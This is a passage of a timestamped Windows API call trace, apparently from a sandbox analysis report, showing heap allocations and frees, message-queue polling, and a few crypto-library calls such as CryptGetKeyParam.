(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0187.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.673] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0187.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28d8 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0187.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.674] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0187.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0187.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.675] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0187.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0187.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0187.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0187.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0187.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.676] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0187.677] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0187.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0187.678] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0187.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0187.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0187.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0187.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0187.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0187.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.682] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.682] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2708, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2708*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0187.682] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.682] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.682] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.683] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0187.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.683] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.683] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.683] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | 